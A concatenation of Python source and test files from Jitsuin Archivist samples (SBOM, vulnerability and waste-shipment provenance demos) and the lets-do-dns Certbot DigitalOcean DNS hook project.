self._environment = sbom_accepted["environment"]
else:
sbom_accepted["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_accepted["description"],
"arc_evidence": "Upgrade Accepted",
"arc_display_type": "Upgrade Accepted",
"sbom_accepted_date": sbom_accepted["date"],
"sbom_accepted_captain": sbom_accepted["captain"],
"sbom_accepted_component": sbom_accepted["name"],
"sbom_accepted_version": sbom_accepted["version"],
"sbom_accepted_reference": sbom_accepted["reference"],
"sbom_accepted_environment": sbom_accepted["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_accepted["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
# Rollback Events
def rollback(
self,
sbom_rollback: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_rollback["environment"] is not None:
self._environment = sbom_rollback["environment"]
else:
sbom_rollback["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_rollback["description"],
"arc_evidence": "Rollback",
"arc_display_type": "Rollback",
"sbom_rollback_component": sbom_rollback["name"],
"sbom_rollback_hash": sbom_rollback["hash"],
"sbom_rollback_version": sbom_rollback["version"],
"sbom_rollback_author": sbom_rollback["author"],
"sbom_rollback_supplier": sbom_rollback["supplier"],
"sbom_rollback_uuid": sbom_rollback["uuid"],
"sbom_rollback_environment": sbom_rollback["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_rollback["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_rollback["name"],
"sbom_hash": sbom_rollback["hash"],
"sbom_version": sbom_rollback["version"],
"sbom_author": sbom_rollback["author"],
"sbom_supplier": sbom_rollback["supplier"],
"sbom_uuid": sbom_rollback["uuid"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def rollback_plan(
self,
sbom_planned: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_planned["environment"] is not None:
self._environment = sbom_planned["environment"]
else:
sbom_planned["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_planned["description"],
"arc_evidence": "Rollback Plan",
"arc_display_type": "Rollback Plan",
"sbom_planned_date": sbom_planned["date"],
"sbom_planned_captain": sbom_planned["captain"],
"sbom_planned_component": sbom_planned["name"],
"sbom_planned_version": sbom_planned["version"],
"sbom_planned_reference": sbom_planned["reference"],
"sbom_planned_environment": sbom_planned["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_planned["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def rollback_accepted(
self,
sbom_accepted: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_accepted["environment"] is not None:
self._environment = sbom_accepted["environment"]
else:
sbom_accepted["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_accepted["description"],
"arc_evidence": "Rollback Accepted",
"arc_display_type": "Rollback Accepted",
"sbom_accepted_date": sbom_accepted["date"],
"sbom_accepted_captain": sbom_accepted["captain"],
"sbom_accepted_component": sbom_accepted["name"],
"sbom_accepted_version": sbom_accepted["version"],
"sbom_accepted_reference": sbom_accepted["reference"],
"sbom_accepted_environment": sbom_accepted["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_accepted["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
# Vulnerability Events
def vuln_disclosure(
self,
vuln: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": vuln["description"],
"arc_evidence": "Vulnerability Disclosure",
"arc_display_type": "Vulnerability Disclosure",
"vuln_name": vuln["name"],
"vuln_reference": vuln["reference"],
"vuln_id": vuln["id"],
"vuln_category": vuln["category"],
"vuln_severity": vuln["severity"],
"vuln_status": vuln["status"],
"vuln_author": vuln["author"],
"vuln_target_component": vuln["target_component"],
"vuln_target_version": vuln["target_version"],
"arc_attachments": [
{
"arc_display_name": vuln["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def vuln_update(
self,
vuln: dict,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": vuln["description"],
"arc_evidence": "Vulnerability Update",
"arc_display_type": "Vulnerability Update",
"vuln_name": vuln["name"],
"vuln_reference": vuln["reference"],
"vuln_id": vuln["id"],
"vuln_category": vuln["category"],
"vuln_severity": vuln["severity"],
"vuln_status": vuln["status"],
"vuln_author": vuln["author"],
"vuln_target_component": vuln["target_component"],
"vuln_target_version": vuln["target_version"],
"arc_attachments": [
{
"arc_display_name": vuln["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def _add_attachments(self, attachments: list):
self._attachments = []
for attachment in attachments:
with open(f"{attachment}", "rb") as fd:
self._attachments.append(self.arch.attachments.upload(fd))
```
#### File: archivist_samples/synsation/analyze.py
```python
from datetime import datetime, timezone
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
from archivist import about
from archivist.parser import common_parser
from archivist.timestamp import parse_timestamp
from ..testing.asset import (
MAINTENANCE_PERFORMED,
MAINTENANCE_REQUEST,
VULNERABILITY_ADDRESSED,
VULNERABILITY_REPORT,
)
from ..testing.parser import common_endpoint
LOGGER = logging.getLogger(__name__)
def analyze_matched_pairs(label, p1, p2, events):
if p1 in events and p2 in events:
matched = set(events[p1]).intersection(events[p2])
unmatched = set(events[p1]).difference(events[p2])
LOGGER.info(f"There are {len(matched)} completed {label} events")
for cv in matched:
# Check how long it was outstanding
time_req = parse_timestamp(events[p1][cv]["timestamp_declared"])
time_resp = parse_timestamp(events[p2][cv]["timestamp_declared"])
response_time = time_resp - time_req
LOGGER.info(f" --> Response time: {response_time}")
LOGGER.info(
f"There are {len(unmatched)} uncompleted {label} events outstanding"
)
# Check how long it has been outstanding
now = datetime.now(timezone.utc)
for cv in unmatched:
time_req = parse_timestamp(events[p1][cv]["timestamp_declared"])
outstanding_time = now - time_req
LOGGER.info(f" --> Outstanding for {outstanding_time}")
else:
LOGGER.info(f"There are NO {label} events to analyse")
def analyze_asset(conn, asset):
# Fetch basic asset info. If any of these fields is missing it's fatal...
try:
aid = asset["identity"]
attrs = asset["attributes"]
aname = attrs["arc_display_name"]
atype = attrs["arc_display_type"]
aversion = attrs["arc_firmware_version"]
aserial = attrs["arc_serial_number"]
adesc = attrs["arc_description"]
except KeyError:
# Some devices won't have this property. Just ignore failures.
LOGGER.error("Malformed Asset.")
return
LOGGER.info("<---------------------------------------->")
LOGGER.info(f"Analyzing {atype} '{aname}' (serial # {aserial})")
LOGGER.info(f'"{adesc}"')
LOGGER.info(f"Current Firmware Version: {aversion}")
# Get all the events for this device
number_of_events = conn.events.count(asset_id=aid)
if number_of_events == 0:
LOGGER.debug("No events found for asset")
LOGGER.info("No events to analyse.")
return
allevents = conn.events.list(asset_id=aid)
# Sort the events into paired buckets that we care about, keyed on
# the events' "correlation_value". Only works for unique pairs of
# correlation values, which is the suggested convention but not
# enforced by Archivist services
sortedevents = {}
for event in allevents:
try:
etype = event["event_attributes"]["arc_display_type"]
corval = event["event_attributes"]["arc_correlation_value"]
except KeyError:
LOGGER.debug("Couldn't get essential info for this event.")
continue
if etype not in sortedevents:
sortedevents[etype] = {}
sortedevents[etype][corval] = event
# Now we've got them all we can do the analysis
# + Which events weren't fixed at all?
# + For events that were fixed, how long did it take?
# maintenance events
analyze_matched_pairs(
"maintenance", MAINTENANCE_REQUEST, MAINTENANCE_PERFORMED, sortedevents
)
# vulnerability events
analyze_matched_pairs(
"firmware", VULNERABILITY_REPORT, VULNERABILITY_ADDRESSED, sortedevents
)
# Summarize TBD
LOGGER.info("---")
def run(archivist):
"""logic goes here"""
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
for asset in archivist.assets.list():
analyze_asset(archivist, asset)
LOGGER.info("Done.")
sys_exit(0)
def entry():
parser, _ = common_parser("Checks maintenance and update performance for assets")
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
# per example options here ....
args = parser.parse_args()
poc = common_endpoint("synsation", args)
run(poc)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/synsation/device_worker.py
```python
import random
import time
def threadmain(charger, timewarp):
while True:
# Wait for a customer to show up
time.sleep(random.randint(1, 10))
# Charge up
charger.charge_job(random.randint(25, 99), timewarp)
# Check if it needs servicing, and kick off a maintenance worker
# thread to attend to it if so
charger.service(timewarp)
```
#### File: archivist_samples/synsation/jitsuinator.py
```python
import datetime
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
import time
import uuid
from archivist import about
from archivist.errors import ArchivistNotFoundError
from archivist.parser import common_parser
from ..testing.asset import MyAsset
from ..testing.parser import common_endpoint
from ..testing.time_warp import TimeWarp
from .util import attachment_upload_from_file
LOGGER = logging.getLogger(__name__)
def demo_flow(ac, asset_id, asset_type, tw, wait):
# Demo flow:
# -> Asset is created, nothing to see here
# -> White hat hacker reports vulnerability
# -> OEM fixes it and issues the patch
# -> Integrator approves the patch and issues new safety certificate
# -> Owner accepts new version and issues maintenance request to have
# it installed by the operator
# -> Operator schedules downtime and patches it
# -> All is well
job_corval = str(uuid.uuid4())
cve_corval = str(uuid.uuid4())
# -> Asset is created, nothing to see here
# -> White hat hacker reports vulnerability
if wait:
time.sleep(wait)
LOGGER.info("White Hat Hacker...")
else:
input("Press to enact White Hat Hacker")
cve_id = "CVE2020-deadbeef"
MyAsset(ac, asset_id, tw, "<EMAIL>",).report_vulnerability(
(
f"Synsation Industries {asset_type}s are vulnerable "
f"to {cve_id}. Upgrade as soon as possible."
),
cve_id,
cve_corval,
)
# -> OEM fixes it and issues the patch
if wait:
time.sleep(wait)
LOGGER.info("OEM patch...")
else:
input("Press to enact OEM issue patch")
MyAsset(ac, asset_id, tw, "<EMAIL>",).patch_vulnerability(
f"Patch for critical vulnerability '{cve_id}' released in version 1.6",
(
"SHA256-sum for official 1.6 release: "
"68ada47318341d060c387a765dd854b57334ab1f7322d22c155428414feb7518"
),
)
# -> Integrator approves the patch and issues new safety certificate
if wait:
time.sleep(wait)
LOGGER.info("Integrator approval...")
else:
input("Press to enact Integrator approves")
iattachment = attachment_upload_from_file(
ac, "trafficlightconformance.png", "image/png"
)
rattachment = attachment_upload_from_file(
ac, "trafficlightconformance.pdf", "application/pdf"
)
MyAsset(ac, asset_id, tw, "<EMAIL>",).certify_patch(
"Safety conformance approved for version 1.6. See attached conformance report",
"DVA Conformance Report attached",
{
"arc_primary_image_identity": iattachment["identity"],
"arc_attachments": [
{
"arc_display_name": "arc_primary_image",
"arc_attachment_identity": iattachment["identity"],
"arc_hash_value": iattachment["hash"]["value"],
"arc_hash_alg": iattachment["hash"]["alg"],
},
{
"arc_display_name": "Conformance Report",
"arc_attachment_identity": rattachment["identity"],
"arc_hash_value": rattachment["hash"]["value"],
"arc_hash_alg": rattachment["hash"]["alg"],
},
],
},
extra_attrs={"synsation_conformance_report": rattachment["identity"]},
)
# -> Owner accepts new version and issues maintenance request to have it installed
if wait:
time.sleep(wait)
LOGGER.info("Owner approval...")
else:
input("Press to enact Owner approves")
MyAsset(ac, asset_id, tw, "<EMAIL>",).service_required(
"Version 1.6 accepted. Please install ASAP",
job_corval,
)
# -> Operator schedules downtime and patches it
if wait:
time.sleep(wait)
LOGGER.info("Maintenance and patch...")
else:
input("Press to enact Maintenance")
MyAsset(ac, asset_id, tw, "<EMAIL>",).service(
f"Upgraded and restarted {asset_type} during safe downtime window",
job_corval,
)
MyAsset(ac, asset_id, tw, "<EMAIL>",).update_firmware(
"Responding to vulnerability 'CVE2020-deadbeef' with patch 'v1.6'",
"1.6",
cve_corval,
)
# -> All is well
LOGGER.info("Done")
# Main app
##########
def run(ac, args):
"""logic goes here"""
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
LOGGER.info("Looking for asset...")
try:
asset = ac.assets.read_by_signature(
attrs={"arc_display_name": args.asset_name},
)
except ArchivistNotFoundError:
LOGGER.info("Asset not found. Aborting.")
sys_exit(1)
asset_id = asset["identity"]
attrs = asset["attributes"]
asset_type = attrs["arc_display_type"] if "arc_display_type" in attrs else "Device"
LOGGER.info("Creating time warp...")
tw = TimeWarp(args.start_date, args.fast_forward)
LOGGER.info("Beginning simulation...")
demo_flow(ac, asset_id, asset_type, tw, args.wait)
LOGGER.info("Done.")
sys_exit(0)
def entry():
parser, _ = common_parser("Runs the Jitsuinator demo script manually")
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
parser.add_argument(
"-n",
"--asset_name",
type=str,
dest="asset_name",
action="store",
default="tcl.ccj.01",
help="Name of the asset to ship",
)
parser.add_argument(
"-s",
"--start-date",
type=lambda d: datetime.datetime.strptime(d, "%Y%m%d"),
dest="start_date",
action="store",
default=datetime.date.today() - datetime.timedelta(days=1),
help="Start date for event series (format: yyyymmdd)",
)
parser.add_argument(
"-f",
"--fast-forward",
type=float,
dest="fast_forward",
action="store",
default=3600,
help="Fast forward time in event series (default: 1 second = 1 hour)",
)
parser.add_argument(
"-w",
"--wait",
type=float,
dest="wait",
action="store",
default=0.0,
help="auto-advance after WAIT seconds",
)
args = parser.parse_args()
poc = common_endpoint("synsation", args)
run(poc, args)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/wipp/run.py
```python
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 'importlib_resources'.
import importlib_resources as pkg_resources
import logging
import random
import string
from sys import exit as sys_exit
from archivist import about
from . import wipp_files
from .wipp import Wipp
LOGGER = logging.getLogger(__name__)
def upload_attachment(arch, path, name):
with pkg_resources.open_binary(wipp_files, path) as fd:
blob = arch.attachments.upload(fd)
attachment = {
"arc_display_name": name,
"arc_attachment_identity": blob["identity"],
"arc_hash_value": blob["hash"]["value"],
"arc_hash_alg": blob["hash"]["alg"],
}
return attachment
def run(arch, args):
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
LOGGER.info("Fetching use case test assets namespace %s", args.namespace)
# Wipp class encapsulates wipp object in RKVST
LOGGER.info("Creating Drum Asset...")
drum = Wipp(arch, "55 gallon drum")
serial_num = "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(12)
)
drumname = "Drum-" + serial_num
drum.create(
drumname,
"Standard non-POC 55 gallon drum",
serial_num,
attachments=[upload_attachment(arch, "55gallon.jpg", "arc_primary_image")],
custom_attrs={
"wipp_capacity": "55",
"wipp_package_id": serial_num,
},
)
LOGGER.info("Drum Asset Created (Identity=%s)", drum.asset["identity"])
# Cask Asset
LOGGER.info("Creating Cask Asset...")
serial_num = "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(12)
)
caskname = "Cask-" + serial_num
cask = Wipp(arch, "TRU RH 72B Cask")
cask.create(
caskname,
"NRC certified type-B road shipping container, capacity 3 x 55-gallon drum",
serial_num,
attachments=[upload_attachment(arch, "rh72b.png", "arc_primary_image")],
custom_attrs={
"wipp_capacity": "3",
},
)
LOGGER.info("Cask Asset Created (Identity=%s)", cask.asset["identity"])
# Drum Characterization
LOGGER.info("Adding characterization...")
drum.characterize(
{
"description": "Waste coding characterization: A2 Fraction 2.10E+05",
"weight": "790300",
"a2fraction_characterized": "2.10E+05",
"activity_characterized": "1.69E+02",
"total_characterized": "2.12E+02",
},
attachments=[
upload_attachment(
arch, "DOE-WIPP-02-3122_Rev_9_FINAL.pdf", "Reference WAC"
),
upload_attachment(arch, "characterization.pdf", "Characterization report"),
],
)
LOGGER.info("Characterization registered...")
# Drum Tomography
LOGGER.info("Adding tomography...")
drum.tomography(
{
"description": "Confirming waste coding characterizations",
"weight": "790300",
"a2fraction_confirmed": "2.10E+05",
"activity_confirmed": "1.69E+02",
"total_confirmed": "2.12E+02",
},
attachments=[
upload_attachment(arch, "wipp_radiography.jpg", "arc_primary_image"),
upload_attachment(
arch, "DOE-WIPP-02-3122_Rev_9_FINAL.pdf", "Reference WAC"
),
],
)
LOGGER.info("Tomography registered...")
# Loading
LOGGER.info("Loading drum and cask...")
drum.loading(
{
"description": "Loaded drum into "
+ cask.asset["attributes"]["arc_display_name"],
"container": cask.asset["identity"],
},
attachments=[
upload_attachment(arch, "trupact_loading.jpg", "arc_primary_image")
],
)
cask.loading(
{
"description": "Filled with "
+ drum.asset["attributes"]["arc_display_name"],
"container": cask.asset["identity"],
},
custom_asset_attrs={
"wipp_inventory": drum.asset["identity"],
},
attachments=[
upload_attachment(arch, "trupact_loading.jpg", "arc_primary_image")
],
)
LOGGER.info("Loading registered...")
# Pre-shipping
LOGGER.info("Pre-shipping inspection...")
drum.preshipping(
{
"description": "Inspection inventory "
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "preshipment_inspection.jpg", "arc_primary_image")
],
)
cask.preshipping(
{
"description": "Inspected " + cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "preshipment_inspection.jpg", "arc_primary_image")
],
)
LOGGER.info("Pre-shipping inspection registered...")
# Departure
LOGGER.info("Loading departure...")
drum.departure(
{
"description": "Departed SRS inventory "
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image"),
upload_attachment(
arch, "SRS_to_WPP_route_instructions.pdf", "approved_route"
),
],
)
cask.departure(
{
"description": cask.asset["attributes"]["arc_display_name"]
+ "departing for WIPP."
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image"),
upload_attachment(
arch, "SRS_to_WPP_route_instructions.pdf", "approved_route"
),
],
)
LOGGER.info("Departure registered...")
# Waypoint
waypoints = [
["Atlanta", "33.592177", "-84.406064"],
["Talladega", "33.592177", "-86.248379"],
["Birmingham", "33.494993", "-86.895403"],
["Tuscaloosa", "33.184220", "-87.610330"],
["Meridian", "32.391672", "-88.532850"],
["Jackson", "32.285409", "-90.074633"],
["Monroe", "32.463868", "-91.893769"],
["Shreveport", "32.537993", "-93.651582"],
["Tyler", "32.334001", "-95.321504"],
["South Dallas", "32.639816", "-96.826631"],
["Gordon", "32.499115", "-98.521317"],
["Abilene", "32.457004", "-99.816598"],
["<NAME>", "32.244259", "-101.458984"],
["Andrews", "32.312469", "-102.548197"],
["Seminole", "32.457004", "-99.816598"],
["Hobbs", "32.244259", "-101.458984"],
]
for point in waypoints:
LOGGER.info("Loading waypoints from %s...", point[0])
cask.waypoint(
{
"description": "TRAGIS smart sensors ping: Checking in near "
+ point[0]
+ " All sensors GREEN",
"latitude": point[1],
"longitude": point[2],
},
custom_attrs={
"wipp_sensors_shock": "0",
"wipp_sensors_rad": "45",
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image")
],
)
LOGGER.info("Waypoints registered...")
# Arrival
LOGGER.info("Loading arrival...")
drum.arrival(
{
"description": "At WIPP, inventory"
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[upload_attachment(arch, "truck_arrival.jpg", "arc_primary_image")],
)
cask.arrival(
{
"description": cask.asset["attributes"]["arc_display_name"]
+ "arriving at WIPP",
},
attachments=[upload_attachment(arch, "truck_arrival.jpg", "arc_primary_image")],
)
LOGGER.info("Arrival registered...")
# Unload
LOGGER.info("Unloading...")
drum.unloading(
{
"description": "Unloaded drum from cask"
+ cask.asset["attributes"]["arc_display_name"],
},
custom_asset_attrs={
"wipp_container": "",
},
attachments=[
upload_attachment(arch, "trupact_unloading.jpg", "arc_primary_image")
],
)
cask.unloading(
{
"description": "Unloaded " + drum.asset["attributes"]["arc_display_name"],
},
custom_asset_attrs={
"wipp_inventory": "",
},
attachments=[
upload_attachment(arch, "trupact_unloading.jpg", "arc_primary_image")
],
)
LOGGER.info("Unloading registered...")
# Emplacement
LOGGER.info("Loading emplacement...")
drum.emplacement(
{
"description": "Emplacement in location D-32",
"location": "D-32",
},
attachments=[
upload_attachment(arch, "waste_placement.jpg", "arc_primary_image")
],
)
LOGGER.info("Emplacement registered...")
sys_exit(0)
``` |
{
"source": "Jitsusama/lets-do-dns",
"score": 3
} |
#### File: lets_do_dns/acme_dns_auth/time_delay.py
```python
import time
def sleep(delay):
"""Pause program execution until delay (in seconds) has expired."""
time.sleep(delay)
```
#### File: tests/system/test_lets-do-dns_script.py
```python
import os
import subprocess
import pytest
from requests import get, delete
# ATTENTION: Look at conftest.py for py.test fixture definitions.
def test_pre_authentication_hook(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_pre_authentication_hook',
})
program_output = subprocess.check_output('lets-do-dns')
record_id = program_output.decode()
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, record_id)
try:
response = get(request_uri, headers=do_auth_header)
record_data = response.json()['domain_record']
expected_hostname = '_acme-challenge.{}'.format(do_hostname)
assert (record_data['type'] == 'TXT'
and record_data['name'] == expected_hostname
and record_data['data'] == 'test_pre_authentication_hook')
finally: # we always want to delete the created record.
delete(request_uri, headers=do_auth_header)
def test_post_authentication_hook_without_post_command(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname,
do_record_id):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_post_authentication_hook_without_post_command',
'CERTBOT_AUTH_OUTPUT':
str(do_record_id)
})
subprocess.check_call('lets-do-dns')
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, do_record_id)
get_response = get(request_uri, headers=do_auth_header)
assert get_response.status_code == 404
def test_post_authentication_hook_with_post_command(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname,
do_record_id):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'LETS_DO_POSTCMD': 'ls file-does-not-exist',
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_post_authentication_hook_with_post_command',
'CERTBOT_AUTH_OUTPUT':
str(do_record_id),
})
postcmd_process = subprocess.Popen(
['lets-do-dns'], stderr=subprocess.PIPE)
_, postcmd_output = postcmd_process.communicate()
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, do_record_id)
get_response = get(request_uri, headers=do_auth_header)
assert (get_response.status_code == 404
and 'file-does-not-exist' in postcmd_output.decode())
def test_help_command():
help_output = subprocess.check_output(['lets-do-dns', '--help'])
assert 'lets-do-dns' in help_output.decode()
def test_missing_required_environment_variables_exits_properly():
with pytest.raises(subprocess.CalledProcessError) as exception:
subprocess.check_call('lets-do-dns')
assert exception.value.returncode == 2
```
#### File: do_domain/resource/test_delete.py
```python
from mock import ANY
import pytest
import requests.exceptions
from lets_do_dns.errors import RecordDeletionError
from lets_do_dns.do_domain.resource import Resource
def test_calls_delete(mocker):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_delete.assert_called_once()
@pytest.mark.parametrize('record_id', [82227342, 2342552])
def test_calls_delete_with_correct_uri(mocker, record_id):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource(
'stub-api-key', 'stub-host', 'stub-domain', record_id=record_id)
resource.delete()
expected_uri = (
'https://api.digitalocean.com/v2/domains/stub-domain/records/%s'
% record_id)
mock_delete.assert_called_once_with(
expected_uri, headers=ANY, timeout=ANY)
def test_calls_delete_with_correct_authorization_header(mocker):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
expected_auth_header = {'Authorization': 'Bearer stub-api-key'}
mock_delete.assert_called_once_with(
ANY, headers=expected_auth_header, timeout=ANY)
def test_calls_delete_with_correct_timeouts(mocker):
mock_post = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_post.assert_called_once_with(
ANY, headers=ANY, timeout=(10, 10))
def test_calls_response_with_delete_response(mocker):
mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete',
return_value='stub-response')
mock_response = mocker.patch(
'lets_do_dns.do_domain.resource.Response')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_response.assert_called_with('stub-response')
@pytest.mark.parametrize(
'requests_exception', [requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout])
def test_raises_authentication_failure_on_requests_exception(
mocker, requests_exception):
mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete',
side_effect=requests_exception)
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
with pytest.raises(RecordDeletionError):
resource.delete()
def test_passes_handled_exception_to_authentication_failure(
mocker):
stub_timeout = requests.exceptions.Timeout()
mocker.patch('lets_do_dns.do_domain.resource.requests.delete',
side_effect=stub_timeout)
mock_record_creation_failure = mocker.patch(
'lets_do_dns.do_domain.resource.RecordDeletionError',
return_value=RecordDeletionError)
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
with pytest.raises(RecordDeletionError):
resource.delete()
mock_record_creation_failure.assert_called_once_with(stub_timeout)
```
#### File: tests/unit/test_errors.py
```python
from subprocess import CalledProcessError
import pytest
from lets_do_dns.errors import (
BaseError, HookError, InputError, AuthenticationError, CleanupError,
RecordCreationError, RecordLookupError,
RecordDeletionError, PostCommandError)
@pytest.mark.parametrize(
'base_exception', [RecordCreationError, RecordDeletionError,
RecordLookupError, InputError])
def test_base_errors_have_docstring(base_exception):
assert base_exception.__doc__
@pytest.mark.parametrize(
'hook_exception', [AuthenticationError, CleanupError])
def test_hook_errors_have_hook_name(hook_exception):
assert hook_exception.hook_name
class TestInheritance(object):
@pytest.mark.parametrize(
'child_exception', [HookError, InputError])
def test_base_errors(self, child_exception):
assert issubclass(child_exception, BaseError)
@pytest.mark.parametrize(
'child_exception', [AuthenticationError, CleanupError])
def test_hook_errors(self, child_exception):
assert issubclass(child_exception, HookError)
@pytest.mark.parametrize(
'child_exception', [RecordCreationError, RecordLookupError])
def test_authentication_errors(self, child_exception):
assert issubclass(child_exception, AuthenticationError)
@pytest.mark.parametrize(
'child_exception', [RecordDeletionError, PostCommandError])
def test_cleanup_errors(self, child_exception):
assert issubclass(child_exception, CleanupError)
class TestBaseError(object):
def test_message_returns_first_line_of_docstring(self):
error = BaseError()
error.__doc__ = 'first-line\nsecond-line'
assert error.message == 'first-line'
def test_message_trims_period_from_end_of_docstring(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
error = BaseError(stub_exception)
error.__doc__ = 'message ending with a period.'
assert error.message == 'message ending with a period'
def test___str___includes_message(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
mock_message = mocker.patch(
'lets_do_dns.errors.BaseError.message',
new_callable=mocker.PropertyMock, return_value='stub-string')
str(BaseError(stub_exception))
mock_message.assert_called_once()
def test___str___includes_passed_exception(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
error = BaseError(stub_exception)
error.__doc__ = 'stub-docstring'
message = str(error)
assert 'stub-exception' in message
class TestHookError(object):
def test_message_includes_parent_message_(self, mocker):
stub_message = mocker.PropertyMock(return_value='stub-message')
mocker.patch(
'lets_do_dns.errors.BaseError.message',
new=stub_message)
error = HookError('stub-exception')
assert 'stub-message' in error.message
@pytest.mark.parametrize(
'hook_under_test', ['authentication', 'cleanup'])
def test_message_includes_stage_information(self, hook_under_test):
error = HookError('stub-exception')
error.hook_name = hook_under_test
